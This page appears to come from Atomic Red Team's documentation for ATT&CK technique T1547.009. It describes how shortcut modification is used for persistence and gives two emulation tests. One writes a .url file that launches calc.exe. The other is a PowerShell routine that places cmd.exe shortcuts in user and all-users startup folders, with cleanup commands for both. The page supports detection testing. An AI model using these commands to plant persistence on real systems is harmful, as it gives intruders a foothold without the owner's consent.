Skip to content
Atomic Red Team
atomics
T1547.009

T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification

Description from ATT&CK (opens in a new tab)

Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. Spearphishing Attachment (opens in a new tab)), adversaries may also create a new shortcut as a means of indirection, while also abusing Masquerading (opens in a new tab) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.

Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. Browser Extensions (opens in a new tab)) to persistently launch malware.

Atomic Tests


Atomic Test #1 - Shortcut Modification

This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. Upon execution, calc.exe will be launched.

Supported Platforms: Windows

auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce

Inputs:

NameDescriptionTypeDefault Value
shortcut_file_pathshortcut modified and executepath%temp%\T1547.009_modified_shortcut.url

Attack Commands: Run with command_prompt!

echo [InternetShortcut] > #{shortcut_file_path}
echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
#{shortcut_file_path}

Cleanup Commands:

del -f #{shortcut_file_path} >nul 2>&1


Atomic Test #2 - Create shortcut to cmd in startup folders

LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup" to view the new shortcut.

Supported Platforms: Windows

auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()
 
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()

Cleanup Commands:

Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore
Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore

Last updated on